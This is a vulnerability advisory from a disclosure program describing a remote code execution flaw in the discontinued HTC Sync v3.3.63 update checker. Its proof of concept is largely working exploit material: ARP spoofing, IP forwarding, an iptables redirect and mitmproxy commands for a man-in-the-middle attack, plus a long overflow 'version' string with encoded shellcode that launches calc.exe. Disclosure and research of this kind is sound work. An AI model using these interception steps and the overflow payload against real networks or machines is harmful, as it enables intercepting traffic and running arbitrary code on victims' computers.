SSD Advisory – HTC Sync Remote Code Execution

February 27, 2017 admin Commentary

Credit to Author: Maor Schwartz| Date: Mon, 27 Feb 2017 10:19:14 +0000

Vulnerabilities Summary
The following advisory describes a remote code execution (RCE) found in HTC Sync version v3.3.63.

Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

Vendor response
The vulnerability was not reported to the vendor because the product has reached end of life on 31 August 2016 and was replaced by HTC Sync Manager which is not vulnerable to this vulnerability.

Vulnerability Details

HTC sync contains a remotely exploitable vulnerability within the latest HTC Sync (v3.3.63) software. During startup or if explicitly triggered by the user, HTC Sync checks for latest versions by sending an HTTP request to htc.com and then parses its reply (XML format).

In particular, the application first requests:

 http://dl2.htc.com/download/pcs/Release1/HTCSync.xml

Which contains a link to the download URI which is available in:

 http://dl2.htc.com/download/pcs/Release1/HTCSyncRelease.xml

1	http://dl2.htc.com/download/pcs/Release1/HTCSyncRelease.xml

By modifying e.g. the “version” field in the XML document an attacker can inject arbitrary code that gets executed on the victims machine.

Proof of Concept

An attacker that can place himself man-in-the-middle, either through ARP spoofing or DNS poisoning can intercept traffic and provide an overly long XML parameter which leads to remote code execution on the victims machine.

We used Kali Linux to set up man in the middle attack:

Enable arp spoofing

 arpspoof -i eth0 -t 192.168.8.90 192.168.8.8 (from victim to mitm)  arpspoof -i eth0 -t 192.168.8.90 192.168.8.1 (from router to victim)

1 2	arpspoof –i eth0 –t 192.168.8.90 192.168.8.8 (from victim to mitm) arpspoof –i eth0 –t 192.168.8.90 192.168.8.1 (from router to victim)

Enable IP forwarding

 echo 1 >> /proc/sys/net/ipv4/ip_forwarding

1	echo 1 >> /proc/sys/net/ipv4/ip_forwarding

Add ip tables rule for mitm proxy:

 iptables -t nat -A PREROUTING -i eth0 -p tcp –dport 80 -j REDIRECT –to-port 8080

1	iptables –t nat –A PREROUTING –i eth0 –p tcp —dport 80 –j REDIRECT —to–port 8080

Start mitmproxy

 mitmproxy -T –host

1	mitmproxy –T —host

Intercept and modify traffic by hand

The “version” string for popping up calc.exe is:

 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAAAAAAAA۫邐C췙狙忴套䥉䥉䥉䥉䥉䍃䍃䍃儷橚塁ぐぁ歁䅁㉑䉁䈲あ䉂䉁偘䄸畂䥊䱋硩牏偅灗灷瀱  奍敘煄偉琱䭬ぶぐ歮牂䱔䭌扃呔䭌剂䡦漶睌穳嘷兖佋䱮汕ㅅ污扦䱆灅兩潊浖煗圹戸剪牂㝆歮牒げ䭬䩐  汵䭬求儴塢捨㠷煷ㅮ煂䭬祢け煗㍎䭌祣桗獩婦楢歎呦䭌儵嘸㄰潙䱎ㅯ佸浆煇杊䡧灙㕤噊䍄浱根歅浑呷㕄  瑩档歎㡆㑑慦䌹噣䭌汆䬰歎桳汷慶䍩歎吵䭌慖偨㥋瑣瑕呷歓䭑慰䤱婰ㅖ潹灹潃漳婐䭬㈲䭪䵌䵱橐ㅓ䵌啍  剮灗瀷偅ざ塳兆歮佒坍潙畊䭏灨敍㉙晳桰䙎啌浭浯佫敫䱇㙳䱃婕偭歉瀹㔴䔴䭏坡㍢剂佢樰灧捃漹番䍲关  氰千湔䕂塒㕵こ䅁

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAA۫邐C췙狙忴套䥉䥉䥉䥉䥉䍃䍃䍃儷橚塁ぐぁ歁䅁㉑䉁䈲あ䉂䉁偘䄸畂䥊䱋硩牏偅灗灷瀱

奍敘煄偉琱䭬ぶぐ歮牂䱔䭌扃呔䭌剂䡦漶睌穳嘷兖佋䱮汕ㅅ污扦䱆灅兩潊浖煗圹戸剪牂㝆歮牒げ䭬䩐

汵䭬求儴塢捨㠷煷ㅮ煂䭬祢け煗㍎䭌祣桗獩婦楢歎呦䭌儵嘸㄰潙䱎ㅯ佸浆煇杊䡧灙㕤噊䍄浱根歅浑呷㕄

瑩档歎㡆㑑慦䌹噣䭌汆䬰歎桳汷慶䍩歎吵䭌慖偨㥋瑣瑕呷歓䭑慰䤱婰ㅖ潹灹潃漳婐䭬㈲䭪䵌䵱橐ㅓ䵌啍

剮灗瀷偅ざ塳兆歮佒坍潙畊䭏灨敍㉙晳桰䙎啌浭浯佫敫䱇㙳䱃婕偭歉瀹㔴䔴䭏坡㍢剂佢樰灧捃漹番䍲关

氰千湔䕂塒㕵こ䅁

https://blogs.securiteam.com/index.php/feed